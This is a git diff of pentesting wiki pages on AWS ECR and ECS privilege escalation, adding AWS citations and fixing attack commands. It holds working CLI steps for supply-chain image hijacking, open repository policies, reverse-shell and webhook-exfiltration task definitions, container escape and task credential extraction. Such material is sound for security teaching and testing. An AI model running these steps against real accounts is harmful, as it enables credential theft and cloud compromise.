+- [20] [describe-launch-templates — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/ec2/describe-launch-templates.html)
+- [21] [describe-launch-template-versions — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/ec2/describe-launch-template-versions.html)
+- [22] [Modify instance metadata options for existing instances](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/configuring-IMDS-existing-instances.html)
+- [23] [Access instance metadata for an EC2 instance](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instancedata-data-retrieval.html)
+- [24] [Make your AMI publicly available for use in Amazon EC2](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/sharingamis-intro.html)
+- [25] [Share an Amazon EBS snapshot with other AWS accounts](https://docs.aws.amazon.com/ebs/latest/userguide/ebs-modifying-snapshot-permissions.html)
+- [26] [create-key-pair — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/ec2/create-key-pair.html)
+- [27] [create-launch-template-version — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/ec2/create-launch-template-version.html)
+- [28] [Add defense in depth against open firewalls, reverse proxies, and SSRF vulnerabilities with enhancements to the EC2 Instance Metadata Service](https://aws.amazon.com/blogs/security/defense-in-depth-open-firewalls-reverse-proxies-ssrf-vulnerabilities-ec2-instance-metadata-service/)
+- [29] [RegisterContainerInstance — Amazon Elastic Container Service API Reference](https://docs.aws.amazon.com/AmazonECS/latest/APIReference/API_RegisterContainerInstance.html)
+- [30] [AddRoleToInstanceProfile — AWS Identity and Access Management API Reference](https://docs.aws.amazon.com/IAM/latest/APIReference/API_AddRoleToInstanceProfile.html)
 
 {{#include ../../../../banners/hacktricks-training.md}}

--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecr-privesc/README.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecr-privesc/README.md
@@ -1,12 +1,10 @@
 # AWS - ECR Privesc
 
-{{#include ../../../../banners/hacktricks-training.md}}
-
 ## ECR
 
-### `ecr:GetAuthorizationToken`,`ecr:BatchGetImage`
+### `ecr:GetAuthorizationToken`, `ecr:BatchGetImage`, `ecr:GetDownloadUrlForLayer`
 
-An attacker with the **`ecr:GetAuthorizationToken`** and **`ecr:BatchGetImage`** can login to ECR and download images.
+An attacker with **`ecr:GetAuthorizationToken`**, **`ecr:BatchGetImage`**, and **`ecr:GetDownloadUrlForLayer`** can authenticate to ECR and download images.<sup>[[1]](#references)</sup>
 
 For more info on how to download images:
 
@@ -14,21 +12,21 @@ For more info on how to download images:
 ../../aws-post-exploitation/aws-ecr-post-exploitation/README.md
 {{#endref}}
 
-**Potential Impact:** Indirect privesc by intercepting sensitive information in the traffic.
+**Potential Impact:** Indirect privilege escalation by inspecting image layers and configuration for embedded credentials, source code, or other sensitive data.
 
-### `ecr:GetAuthorizationToken`, `ecr:BatchCheckLayerAvailability`, `ecr:CompleteLayerUpload`, `ecr:InitiateLayerUpload`, `ecr:PutImage`, `ecr:UploadLayerPart`
+### `ecr:GetAuthorizationToken`, `ecr:BatchCheckLayerAvailability`, `ecr:BatchGetImage`, `ecr:CompleteLayerUpload`, `ecr:InitiateLayerUpload`, `ecr:PutImage`, `ecr:UploadLayerPart`
 
-An attacker with the all those permissions **can login to ECR and upload images**. This can be useful to escalate privileges to other environments where those images are being used.
+An attacker with all those permissions **can authenticate to ECR and upload images**. This can be useful to escalate privileges to other environments where those images are being used.<sup>[[2]](#references)</sup>
 
-In addition, `ecr:PutImage` can be used to **overwrite an existing tag** (for example `stable` / `prod`) by uploading a different image manifest under that tag, effectively hijacking tag-based deployments.
+In addition, `ecr:PutImage` can be used to **overwrite an existing tag** (for example `stable` / `prod`) by uploading a different image manifest under that tag, effectively hijacking tag-based deployments.<sup>[[3]](#references)</sup>
 
-This becomes especially impactful when downstream consumers deploy by tag and **auto-refresh** on tag changes, such as:
+This becomes especially impactful when downstream consumers resolve tags during a deployment, restart, or other refresh operation, such as:
 
-- **Lambda container image functions** (`PackageType=Image`) referencing `.../repo:stable`
-- ECS services / Kubernetes workloads pulling `repo:prod` (without digest pinning)
-- Any CI/CD that redeploys on ECR events
+- **Lambda container image functions** (`PackageType=Image`) referencing `.../repo:stable`; Lambda resolves the tag to a digest and does not automatically update the function when the tag changes, so a pipeline that calls `UpdateFunctionCode` with the tag is the refresh boundary.<sup>[[4]](#references)</sup>
+- ECS services / Kubernetes workloads pulling `repo:prod` (without digest pinning), when a new task or pod is started.<sup>[[5]](#references)</sup>
+- Any CI/CD that redeploys after an image push.
 
-In those cases, a tag overwrite can lead to **remote code execution** in the consumer environment and privilege escalation to the IAM role used by that workload (for example, a Lambda execution role with `secretsmanager:GetSecretValue`).
+In those cases, a tag overwrite can lead to **remote code execution** in the consumer environment and privilege escalation to the IAM role used by that workload (for example, a Lambda execution role with `secretsmanager:GetSecretValue`).<sup>[[3]](#references)[[4]](#references)[[5]](#references)</sup>
 
 To learn how to upload a new image/update one, check:
 
@@ -36,14 +34,13 @@ To learn how to upload a new image/update one, check:
 ../../aws-services/aws-eks-enum.md
 {{#endref}}
 
-### `ecr-public:GetAuthorizationToken`, `ecr-public:BatchCheckLayerAvailability, ecr-public:CompleteLayerUpload`, `ecr-public:InitiateLayerUpload, ecr-public:PutImage`, `ecr-public:UploadLayerPart`
+### `ecr-public:GetAuthorizationToken`, `sts:GetServiceBearerToken`, `ecr-public:BatchCheckLayerAvailability`, `ecr-public:CompleteLayerUpload`, `ecr-public:InitiateLayerUpload`, `ecr-public:PutImage`, `ecr-public:UploadLayerPart`
 
-Like the previous section, but for public repositories.
+Like the previous section, but for public repositories. ECR Public authentication requires both **`ecr-public:GetAuthorizationToken`** and **`sts:GetServiceBearerToken`** in an identity-based policy, in addition to the repository push permissions.<sup>[[6]](#references)[[7]](#references)</sup>
 
 ### `ecr:SetRepositoryPolicy`
 
-An attacker with this permission could **change** the **repository** **policy** to grant himself (or even everyone) **read/write access**.\
-For example, in this example read access is given to everyone.
+An attacker with this permission could **change** the **repository** **policy** to grant himself (or even everyone) **read/write access**. In a private repository, `Principal: "*"` grants the listed actions to any authenticated AWS principal that can access the registry.<sup>[[8]](#references)</sup>
 
 ```bash
 aws ecr set-repository-policy \
@@ -73,8 +70,7 @@ Contents of `my-policy.json`:
 
 ### `ecr-public:SetRepositoryPolicy`
 
-Like the previoous section, but for public repositories.\
-An attacker can **modify the repository policy** of an ECR Public repository to grant unauthorized public access or to escalate their privileges.
+Like the previous section, but for public repositories. Public repositories are already visible and pullable; an attacker can **modify the repository policy** to grant broad push, image-deletion, or policy-management access.<sup>[[6]](#references)[[7]](#references)</sup>
 
 ```bash
 # Create a JSON file with the malicious public repository policy
@@ -86,13 +82,12 @@ echo '{
       "Effect": "Allow",
       "Principal": "*",
       "Action": [
-        "ecr-public:GetDownloadUrlForLayer",
-        "ecr-public:BatchGetImage",
         "ecr-public:BatchCheckLayerAvailability",
         "ecr-public:PutImage",
         "ecr-public:InitiateLayerUpload",
         "ecr-public:UploadLayerPart",
         "ecr-public:CompleteLayerUpload",
+        "ecr-public:BatchDeleteImage",
         "ecr-public:DeleteRepositoryPolicy"
       ]
     }
@@ -103,36 +98,29 @@ echo '{
 aws ecr-public set-repository-policy --repository-name your-ecr-public-repo-name --policy-text file://malicious_public_repo_policy.json
 ```
 
-**Potential Impact**: Unauthorized public access to the ECR Public repository, allowing any user to push, pull, or delete images.
+**Potential Impact**: Unauthorized public write and policy-management access to the ECR Public repository, allowing any authenticated principal to push or delete images and delete the repository policy; pulls are public by design.<sup>[[6]](#references)[[7]](#references)</sup>
 
 ### `ecr:PutRegistryPolicy`
 
-An attacker with this permission could **change** the **registry policy** to grant himself, his account (or even everyone) **read/write access**.
+Under registry policy V2, an attacker with this permission could **change** the **registry policy** to grant himself, his account (or even everyone) **read/write access**.<sup>[[9]](#references)</sup>
 
 ```bash
-aws ecr set-repository-policy \
-    --repository-name <repo_name> \
+aws ecr put-registry-policy \
     --policy-text file://my-policy.json
 ```
 
+### `ecr:CreatePullThroughCacheRule`
 
+Abuse ECR Pull Through Cache (PTC) rules to map an attacker-controlled upstream namespace to a trusted private ECR prefix. This makes workloads pulling from the private ECR transparently receive attacker images without any push to private ECR.<sup>[[10]](#references)</sup>
 
-
-
-
-
-### ecr:CreatePullThroughCacheRule
-
-Abuse ECR Pull Through Cache (PTC) rules to map an attacker-controlled upstream namespace to a trusted private ECR prefix. This makes workloads pulling from the private ECR transparently receive attacker images without any push to private ECR.
-
-- Required perms: ecr:CreatePullThroughCacheRule, ecr:DescribePullThroughCacheRules, ecr:DeletePullThroughCacheRule. If using ECR Public upstream: ecr-public:* to create/push to the public repo.
+- Required perms: `ecr:CreatePullThroughCacheRule` (identity policy), `ecr:BatchImportUpstreamImage`, and `ecr:CreateRepository` when the cached repository does not already exist, plus the normal private ECR authentication and pull permissions. `ecr:DescribePullThroughCacheRules` and `ecr:DeletePullThroughCacheRule` are useful for verification and cleanup. If using ECR Public upstream, the attacker also needs `ecr-public:GetAuthorizationToken`, `sts:GetServiceBearerToken`, and permission to create and push to the public repository.<sup>[[11]](#references)[[6]](#references)</sup>
 - Tested upstream: public.ecr.aws
 
 Steps (example):
 
-1. Prepare attacker image in ECR Public
+1. Prepare attacker image in an existing ECR Public repository that the attacker can push to.<sup>[[7]](#references)</sup>
     # Get your ECR Public alias with: aws ecr-public describe-registries --region us-east-1
-    docker login public.ecr.aws/<public_alias>
+    aws ecr-public get-login-password --region us-east-1 | docker login --username AWS --password-stdin public.ecr.aws
     docker build -t public.ecr.aws/<public_alias>/hacktricks-ptc-demo:ptc-test .
     docker push public.ecr.aws/<public_alias>/hacktricks-ptc-demo:ptc-test
 
@@ -140,18 +128,18 @@ Steps (example):
     aws ecr create-pull-through-cache-rule --region us-east-2 --ecr-repository-prefix ptc --upstream-registry-url public.ecr.aws
 
 3. Pull the attacker image via the private ECR path (no push to private ECR was done)
-    docker login <account_id>.dkr.ecr.us-east-2.amazonaws.com
+    aws ecr get-login-password --region us-east-2 | docker login --username AWS --password-stdin <account_id>.dkr.ecr.us-east-2.amazonaws.com
     docker pull <account_id>.dkr.ecr.us-east-2.amazonaws.com/ptc/<public_alias>/hacktricks-ptc-demo:ptc-test
     docker run --rm <account_id>.dkr.ecr.us-east-2.amazonaws.com/ptc/<public_alias>/hacktricks-ptc-demo:ptc-test
 
-Potential Impact: Supply-chain compromise by hijacking internal image names under the chosen prefix. Any workload pulling images from the private ECR using that prefix will receive attacker-controlled content.
+Potential Impact: Supply-chain compromise by hijacking internal image names under the chosen prefix. Any workload pulling images from the private ECR using that prefix will receive attacker-controlled content.<sup>[[12]](#references)</sup>
 
 ### `ecr:PutImageTagMutability`
 
-Abuse this permission to flip a repository with tag immutability to mutable and overwrite trusted tags (e.g., latest, stable, prod) with attacker-controlled content.
+Abuse this permission to flip a repository with tag immutability to mutable and overwrite trusted tags (e.g., latest, stable, prod) with attacker-controlled content.<sup>[[13]](#references)</sup>
 
-- Required perms: `ecr:PutImageTagMutability` plus push capabilities (`ecr:GetAuthorizationToken`, `ecr:InitiateLayerUpload`, `ecr:UploadLayerPart`, `ecr:CompleteLayerUpload`, `ecr:PutImage`).
-- Impact: Supply-chain compromise by silently replacing immutable tags without changing tag names.
+- Required perms: `ecr:PutImageTagMutability` plus push capabilities (`ecr:GetAuthorizationToken`, `ecr:BatchCheckLayerAvailability`, `ecr:BatchGetImage`, `ecr:InitiateLayerUpload`, `ecr:UploadLayerPart`, `ecr:CompleteLayerUpload`, `ecr:PutImage`). The demonstration also needs `ecr:CreateRepository` to create its test repository.<sup>[[2]](#references)</sup>
+- Impact: Supply-chain compromise by silently replacing immutable tags without changing tag names.<sup>[[3]](#references)[[5]](#references)</sup>
 
 Steps (example):
 
@@ -180,12 +168,12 @@ docker run --rm ${acct}.dkr.ecr.${REGION}.amazonaws.com/${REPO}:prod
 
 #### Global registry hijack via ROOT Pull-Through Cache rule
 
-Create a Pull-Through Cache (PTC) rule using the special `ecrRepositoryPrefix=ROOT` to map the root of the private ECR registry to an upstream public registry (e.g., ECR Public). Any pull to a non-existent repository in the private registry will be transparently served from upstream, enabling supply-chain hijacking without pushing to private ECR.
+Create a Pull-Through Cache (PTC) rule using the special `ecrRepositoryPrefix=ROOT` to map the root of the private ECR registry to an upstream public registry (e.g., ECR Public). Any pull to a non-existent repository in the private registry will be transparently served from upstream, enabling supply-chain hijacking without pushing to private ECR.<sup>[[14]](#references)[[12]](#references)</sup>
 
-- Required perms: `ecr:CreatePullThroughCacheRule`, `ecr:DescribePullThroughCacheRules`, `ecr:DeletePullThroughCacheRule`, `ecr:GetAuthorizationToken`.
-- Impact: Pulls to `<account>.dkr.ecr.<region>.amazonaws.com/<any-existing-upstream-path>:<tag>` succeed and auto-create private repos sourced from upstream.
+- Required perms: `ecr:CreatePullThroughCacheRule` (identity policy), `ecr:BatchImportUpstreamImage`, `ecr:CreateRepository` when the target repository is absent, and the normal private ECR authentication and pull permissions. `ecr:DescribePullThroughCacheRules` and `ecr:DeletePullThroughCacheRule` are useful for verification and cleanup.<sup>[[11]](#references)</sup>
+- Impact: Pulls to `<account>.dkr.ecr.<region>.amazonaws.com/<any-existing-upstream-path>:<tag>` can succeed and auto-create private repositories sourced from upstream when the required permissions are present.<sup>[[12]](#references)</sup>
 
-> Note: For `ROOT` rules, omit `--upstream-repository-prefix`. Supplying it will cause a validation error.
+> Note: For `ROOT` rules, omit `--upstream-repository-prefix`; AWS only permits that parameter when the ECR repository prefix is not `ROOT`.<sup>[[14]](#references)</sup>
 
 <details>
 <summary>Demo (us-east-1, upstream public.ecr.aws)</summary>
@@ -209,7 +197,7 @@ docker pull ${ACCT}.dkr.ecr.${REGION}.amazonaws.com/docker/library/alpine:latest
 
 # 3) Verify repo and image now exist without any push
 aws ecr describe-repositories --region "$REGION" \
-  --query "repositories[?repositoryName==docker/library/alpine]"
+  --query "repositories[?repositoryName=='docker/library/alpine']"
 aws ecr list-images --region "$REGION" --repository-name docker/library/alpine --filter tagStatus=TAGGED
 
 # 4) Cleanup
@@ -219,76 +207,27 @@ aws ecr delete-repository --region "$REGION" --repository-name docker/library/al
 
 </details>
 
-### `ecr:PutAccountSetting` (Downgrade `REGISTRY_POLICY_SCOPE` to bypass registry policy denies)
+### `ecr:PutAccountSetting` (registry policy scope)
 
-Abuse `ecr:PutAccountSetting` to switch the registry policy scope from `V2` (policy applied to all ECR actions) to `V1` (policy applied only to `CreateRepository`, `ReplicateImage`, `BatchImportUpstreamImage`). If a restrictive registry policy Deny blocks actions like `CreatePullThroughCacheRule`, downgrading to `V1` removes that enforcement so identity‑policy Allows take effect.
+Registry policy V1 supported only `CreateRepository`, `ReplicateImage`, and `BatchImportUpstreamImage`, while V2 supports all ECR actions. AWS's current `PutAccountSetting` API lists only `V2` as a valid `REGISTRY_POLICY_SCOPE` value, so the former V2-to-V1 downgrade procedure is not a supported bypass and is omitted.<sup>[[9]](#references)[[15]](#references)[[16]](#references)</sup>
 
-- Required perms: `ecr:PutAccountSetting`, `ecr:PutRegistryPolicy`, `ecr:GetRegistryPolicy`, `ecr:CreatePullThroughCacheRule`, `ecr:DescribePullThroughCacheRules`, `ecr:DeletePullThroughCacheRule`.
-- Impact: Ability to perform ECR actions previously blocked by a registry policy Deny (e.g., create PTC rules) by temporarily setting scope to `V1`.
+## References
 
-Steps (example):
-
-<details>
-<summary>Bypass registry policy Deny on CreatePullThroughCacheRule by switching to V1</summary>
-
-```bash
-REGION=us-east-1
-ACCT=$(aws sts get-caller-identity --query Account --output text)
-
-# 0) Snapshot current scope/policy (for restore)
-aws ecr get-account-setting --name REGISTRY_POLICY_SCOPE --region $REGION || true
-aws ecr get-registry-policy --region $REGION > /tmp/orig-registry-policy.json 2>/dev/null || echo '{}' > /tmp/orig-registry-policy.json
-
-# 1) Ensure V2 and set a registry policy Deny for CreatePullThroughCacheRule
-aws ecr put-account-setting --name REGISTRY_POLICY_SCOPE --value V2 --region $REGION
-cat > /tmp/deny-ptc.json <<'JSON'
-{
-  "Version": "2012-10-17",
-  "Statement": [
-    {
-      "Sid": "DenyPTCAll",
-      "Effect": "Deny",
-      "Principal": "*",
-      "Action": ["ecr:CreatePullThroughCacheRule"],
-      "Resource": "*"
-    }
-  ]
-}
-JSON
-aws ecr put-registry-policy --policy-text file:///tmp/deny-ptc.json --region $REGION
-
-# 2) Attempt to create a PTC rule (should FAIL under V2 due to Deny)
-set +e
-aws ecr create-pull-through-cache-rule \
-  --region $REGION \
-  --ecr-repository-prefix ptc-deny-test \
-  --upstream-registry-url public.ecr.aws
-RC=$?
-set -e
-if [ "$RC" -eq 0 ]; then echo "UNEXPECTED: rule creation succeeded under V2 deny"; fi
-
-# 3) Downgrade scope to V1 and retry (should SUCCEED now)
-aws ecr put-account-setting --name REGISTRY_POLICY_SCOPE --value V1 --region $REGION
-aws ecr create-pull-through-cache-rule \
-  --region $REGION \
-  --ecr-repository-prefix ptc-deny-test \
-  --upstream-registry-url public.ecr.aws
-
-# 4) Verify rule exists
-aws ecr describe-pull-through-cache-rules --region $REGION \
-  --query "pullThroughCacheRules[?ecrRepositoryPrefix=='ptc-deny-test']"
-
-# 5) Cleanup and restore
-aws ecr delete-pull-through-cache-rule --region $REGION --ecr-repository-prefix ptc-deny-test || true
-if jq -e '.registryPolicyText' /tmp/orig-registry-policy.json >/dev/null 2>&1; then
-  jq -r '.registryPolicyText' /tmp/orig-registry-policy.json > /tmp/_orig.txt
-  aws ecr put-registry-policy --region $REGION --policy-text file:///tmp/_orig.txt
-else
-  aws ecr delete-registry-policy --region $REGION || true
-fi
-aws ecr put-account-setting --name REGISTRY_POLICY_SCOPE --value V2 --region $REGION
-```
-
-</details>
+- [1] [Using Amazon ECR images with Amazon ECS](https://docs.aws.amazon.com/AmazonECR/latest/userguide/ECR_on_ECS.html)
+- [2] [IAM permissions for pushing an image to an Amazon ECR private repository](https://docs.aws.amazon.com/AmazonECR/latest/userguide/image-push-iam.html)
+- [3] [put-image — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/ecr/put-image.html)
+- [4] [UpdateFunctionCode — AWS Lambda API Reference](https://docs.aws.amazon.com/lambda/latest/api/API_UpdateFunctionCode.html)
+- [5] [Deploy Amazon ECS services by replacing tasks](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/deployment-type-ecs.html)
+- [6] [Public repository policies in Amazon ECR Public](https://docs.aws.amazon.com/AmazonECR/latest/public/public-repository-policies.html)
+- [7] [Amazon ECR Public examples using AWS CLI](https://docs.aws.amazon.com/cli/latest/userguide/cli_ecr-public_code_examples.html)
+- [8] [Private repository policies in Amazon ECR](https://docs.aws.amazon.com/AmazonECR/latest/userguide/repository-policies.html)
+- [9] [Private registry permissions in Amazon ECR](https://docs.aws.amazon.com/AmazonECR/latest/userguide/registry-permissions.html)
+- [10] [Creating a pull through cache rule in Amazon ECR](https://docs.aws.amazon.com/AmazonECR/latest/userguide/pull-through-cache-creating-rule.html)
+- [11] [IAM permissions required to sync an upstream registry with an Amazon ECR private registry](https://docs.aws.amazon.com/AmazonECR/latest/userguide/pull-through-cache-iam.html)
+- [12] [Sync an upstream registry with an Amazon ECR private registry](https://docs.aws.amazon.com/AmazonECR/latest/userguide/pull-through-cache.html)
+- [13] [Preventing image tags from being overwritten in Amazon ECR](https://docs.aws.amazon.com/AmazonECR/latest/userguide/image-tag-mutability.html)
+- [14] [Customizing repository prefixes for ECR to ECR pull through cache](https://docs.aws.amazon.com/AmazonECR/latest/userguide/pull-through-cache-private-wildcards.html)
+- [15] [PutAccountSetting — Amazon Elastic Container Registry API Reference](https://docs.aws.amazon.com/AmazonECR/latest/APIReference/API_PutAccountSetting.html)
+- [16] [Amazon ECR expands registry policy to all ECR actions](https://aws.amazon.com/about-aws/whats-new/2024/12/amazon-ecr-expands-registry-policy-ecr-actions/)
 
 {{#include ../../../../banners/hacktricks-training.md}}

--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc/README.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc/README.md
@@ -1,7 +1,5 @@
 # AWS - ECS Privesc
 
-{{#include ../../../../banners/hacktricks-training.md}}
-
 ## ECS
 
 More **info about ECS** in:
@@ -12,7 +10,7 @@ More **info about ECS** in:
 
 ### `iam:PassRole`, `ecs:RegisterTaskDefinition`, `ecs:RunTask`
 
-An attacker abusing the `iam:PassRole`, `ecs:RegisterTaskDefinition` and `ecs:RunTask` permission in ECS can **generate a new task definition** with a **malicious container** that steals the metadata credentials and **run it**.
+An attacker abusing the `iam:PassRole`, `ecs:RegisterTaskDefinition` and `ecs:RunTask` permission in ECS can **generate a new task definition** with a **malicious container** that steals the metadata credentials and **run it**.<sup>[[16]](#references)[[1]](#references)[[2]](#references)[[3]](#references)</sup>
 
 {{#tabs }}
 {{#tab name="Reverse Shell" }}
@@ -40,7 +38,7 @@ aws ecs deregister-task-definition --task-definition iam_exfiltration:1
 
 {{#tab name="Webhook" }}
 
-Create a webhook with a site like webhook.site 
+Create a webhook with a site like webhook.site
 
 ```bash
 
@@ -65,7 +63,7 @@ aws ecs register-task-definition \
   --memory 512 \
   --requires-compatibilities FARGATE \
   --container-definitions file://container-definition.json
-  
+
 # Check the webhook for a response
 
 # Delete task definition
@@ -77,19 +75,20 @@ aws ecs deregister-task-definition --task-definition iam_exfiltration:1
 
 {{#endtabs }}
 
-**Potential Impact:** Direct privesc to a different ECS role.
+**Potential Impact:** Direct privesc to a different ECS role.<sup>[[16]](#references)[[1]](#references)[[2]](#references)</sup>
 
-### `iam:PassRole`,`ecs:RunTask`
-An attacker that has `iam:PassRole` and `ecs:RunTask` permissions can start a new ECS task with modified **execution role**, **task role** and container's **command** values.  The `ecs run-task` CLI command contains the `--overrides` flag which allows changing at runtime the `executionRoleArn`, `taskRoleArn` and container's `command` without touching the task definition.
+### `iam:PassRole`, `ecs:RunTask`
 
-The specified IAM roles for `taskRoleArn` and `executionRoleArn` must trust/allow to be assumed by the `ecs-tasks.amazonaws.com` in its trust policy.  
+An attacker that has `iam:PassRole` and `ecs:RunTask` permissions can start a new ECS task with modified **execution role**, **task role** and container **command** values. The `ecs run-task` CLI command contains the `--overrides` flag, which allows changing `executionRoleArn`, `taskRoleArn`, and container commands at runtime without modifying the task definition.<sup>[[4]](#references)</sup>
+
+The specified IAM roles for `taskRoleArn` and `executionRoleArn` must trust the `ecs-tasks.amazonaws.com` service principal.<sup>[[2]](#references)</sup>
 
 Also, the attacker needs to know:
-- ECS cluster name 
+- ECS cluster name
 - VPC Subnet
-- Security group (If no security group is specified the default one will be used) 
+- Security group (If no security group is specified the default one will be used)
 - Task Definition Name and revision
-- Name of the Container 
+- Name of the Container
 
 ```bash
 aws ecs run-task \
@@ -109,9 +108,9 @@ aws ecs run-task \
 }'
 ```
 
-In the code snippet above an attacker overrides only `taskRoleArn` value. However, the attacker must have `iam:PassRole` permission over the `taskRoleArn` specified in the command and the `executionRoleArn` specified in the task definition for the attack to happen.
+In the code snippet above an attacker overrides only `taskRoleArn` value. However, the attacker must have `iam:PassRole` permission over the `taskRoleArn` specified in the command and the `executionRoleArn` specified in the task definition for the attack to happen.<sup>[[5]](#references)</sup>
 
-If the IAM role that the attacker can pass has enough privileges to pull to ECR image and start the ECS task (`ecr:BatchCheckLayerAvailability`, `ecr:GetDownloadUrlForLayer`,`ecr:BatchGetImage`,`ecr:GetAuthorizationToken`) then the attacker can specify the same IAM role for both `executionRoleArn` and `taskRoleArn` in the `ecs run-task` command.
+If the IAM role that the attacker can pass has enough privileges to pull to ECR image and start the ECS task (`ecr:BatchCheckLayerAvailability`, `ecr:GetDownloadUrlForLayer`,`ecr:BatchGetImage`,`ecr:GetAuthorizationToken`) then the attacker can specify the same IAM role for both `executionRoleArn` and `taskRoleArn` in the `ecs run-task` command.<sup>[[6]](#references)</sup>
 
 ```sh
 aws ecs run-task --cluster <cluster-name> --launch-type FARGATE --network-configuration "awsvpcConfiguration={subnets=[<subnet-id>],securityGroups=[<security-group-id>],assignPublicIp=ENABLED}" --task-definition <task-definition:revision> --overrides '
@@ -127,12 +126,12 @@ aws ecs run-task --cluster <cluster-name> --launch-type FARGATE --network-config
 }'
 ```
 
-**Potential Impact:** Direct privesc to any ECS task role.
+**Potential Impact:** Direct privesc to any ECS task role.<sup>[[2]](#references)[[5]](#references)</sup>
 
 ### `iam:PassRole`, `ecs:RegisterTaskDefinition`, `ecs:StartTask`
 
 Just like in the previous example an attacker abusing the **`iam:PassRole`, `ecs:RegisterTaskDefinition`, `ecs:StartTask`** permissions in ECS can **generate a new task definition** with a **malicious container** that steals the metadata credentials and **run it**.\
-However, in this case, a container instance to run the malicious task definition need to be.
+However, in this case, a container instance is required to run the malicious task definition.<sup>[[1]](#references)[[3]](#references)</sup>
 
 ```bash
 # Generate task definition with rev shell
@@ -150,11 +149,11 @@ aws ecs start-task --task-definition iam_exfiltration \
 aws ecs deregister-task-definition --task-definition iam_exfiltration:1
 ```
 
-**Potential Impact:** Direct privesc to any ECS role.
+**Potential Impact:** Direct privesc to any ECS role.<sup>[[1]](#references)[[2]](#references)</sup>
 
 ### `iam:PassRole`, `ecs:RegisterTaskDefinition`, (`ecs:UpdateService|ecs:CreateService)`
 
-Just like in the previous example an attacker abusing the **`iam:PassRole`, `ecs:RegisterTaskDefinition`, `ecs:UpdateService`** or **`ecs:CreateService`** permissions in ECS can **generate a new task definition** with a **malicious container** that steals the metadata credentials and **run it by creating a new service with at least 1 task running.**
+Just like in the previous example an attacker abusing the **`iam:PassRole`, `ecs:RegisterTaskDefinition`, `ecs:UpdateService`** or **`ecs:CreateService`** permissions in ECS can **generate a new task definition** with a **malicious container** that steals the metadata credentials and **run it by creating a new service with at least 1 task running.**<sup>[[16]](#references)[[1]](#references)[[3]](#references)[[5]](#references)</sup>
 
 ```bash
 # Generate task definition with rev shell
@@ -179,11 +178,11 @@ aws ecs update-service --cluster <CLUSTER NAME> \
     --task-definition <NEW TASK DEFINITION NAME>
 ```
 
-**Potential Impact:** Direct privesc to any ECS role.
+**Potential Impact:** Direct privesc to any ECS role.<sup>[[1]](#references)[[2]](#references)</sup>
 
-### `iam:PassRole`, (`ecs:UpdateService|ecs:CreateService)`
+### Runtime command overrides with `iam:PassRole` and `ecs:RunTask`
 
-Actually, just with those permissions it's possible to use overrides to executer arbitrary commands in a container with an arbitrary role with something like:
+With `iam:PassRole` and `ecs:RunTask`, an attacker can use task overrides to execute arbitrary commands in a container with an arbitrary role, for example:<sup>[[4]](#references)[[5]](#references)</sup>
 
 ```bash
 aws ecs run-task \
@@ -193,16 +192,16 @@ aws ecs run-task \
     --network-configuration "{\"awsvpcConfiguration\":{\"assignPublicIp\": \"DISABLED\", \"subnets\":[\"<subnet-name>\"]}}"
 ```
 
-**Potential Impact:** Direct privesc to any ECS role.
+**Potential Impact:** Direct privesc to any ECS role.<sup>[[1]](#references)[[2]](#references)</sup>
 
-### `ecs:RegisterTaskDefinition`, **`(ecs:RunTask|ecs:StartTask|ecs:UpdateService|ecs:CreateService)`**
+### `ecs:RegisterTaskDefinition` and a task-launching action
 
 This scenario is like the previous ones but **without** the **`iam:PassRole`** permission.\
 This is still interesting because if you can run an arbitrary container, even if it's without a role, you could **run a privileged container to escape** to the node and **steal the EC2 IAM role** and the **other ECS containers roles** running in the node.\
-You could even **force other tasks to run inside the EC2 instance** you compromise to steal their credentials (as discussed in the [**Privesc to node section**](aws-ecs-post-exploitation/README.md#privesc-to-node)).
+You could even **force other tasks to run inside the EC2 instance** you compromise to steal their credentials (as discussed in the [**Privesc to node section**](../../aws-post-exploitation/aws-ecs-post-exploitation/README.md#privesc-to-node)).<sup>[[1]](#references)[[2]](#references)</sup>
 
 > [!WARNING]
-> This attack is only possible if the **ECS cluster is using EC2** instances and not Fargate.
+> This attack is only possible if the **ECS cluster is using EC2** instances and not Fargate.<sup>[[2]](#references)[[4]](#references)</sup>
 
 ```bash
 printf '[
@@ -245,12 +244,12 @@ aws ecs run-task --task-definition iam_exfiltration \
 # You will need to do 'apt update' and 'apt install docker.io' to install docker in the rev shell
 ```
 
-### `ecs:ExecuteCommand`, `ecs:DescribeTasks,`**`(ecs:RunTask|ecs:StartTask|ecs:UpdateService|ecs:CreateService)`**
+### `ecs:ExecuteCommand`, `ecs:DescribeTasks`, and optionally a task-launching action
 
-An attacker with the **`ecs:ExecuteCommand`, `ecs:DescribeTasks`** can **execute commands** inside a running container and exfiltrate the IAM role attached to it (you need the describe permissions because it's necessary to run `aws ecs execute-command`).\
-However, in order to do that, the container instance need to be running the **ExecuteCommand agent** (which by default isn't).
+An attacker with **`ecs:ExecuteCommand` and `ecs:DescribeTasks`** can **execute commands** inside a running container and exfiltrate the IAM role attached to it (`DescribeTasks` is needed to run `aws ecs execute-command`).<sup>[[7]](#references)</sup>\
+However, in order to do that, ECS Exec must be enabled for the task and the container must have a running **ExecuteCommand agent**.<sup>[[7]](#references)</sup>
 
-Therefore, the attacker cloud try to:
+Therefore, the attacker could try to:
 
 - **Try to run a command** in every running container
 
@@ -272,7 +271,7 @@ aws ecs execute-command --interactive \
    --task "$TASK_ARN"
 ```
 
-Once you have a shell inside the container, you can typically **extract the task role credentials** from the task credentials endpoint and reuse them outside the container:
+Once you have a shell inside the container, you can typically **extract the task role credentials** from the task credentials endpoint and reuse them outside the container.<sup>[[2]](#references)[[8]](#references)</sup>
 
 ```sh
 # Inside the container:
@@ -290,14 +289,14 @@ print("export AWS_SESSION_TOKEN=" + d["Token"])
 PY
 ```
 
-- If he has **`ecs:RunTask`**, run a task with `aws ecs run-task --enable-execute-command [...]`
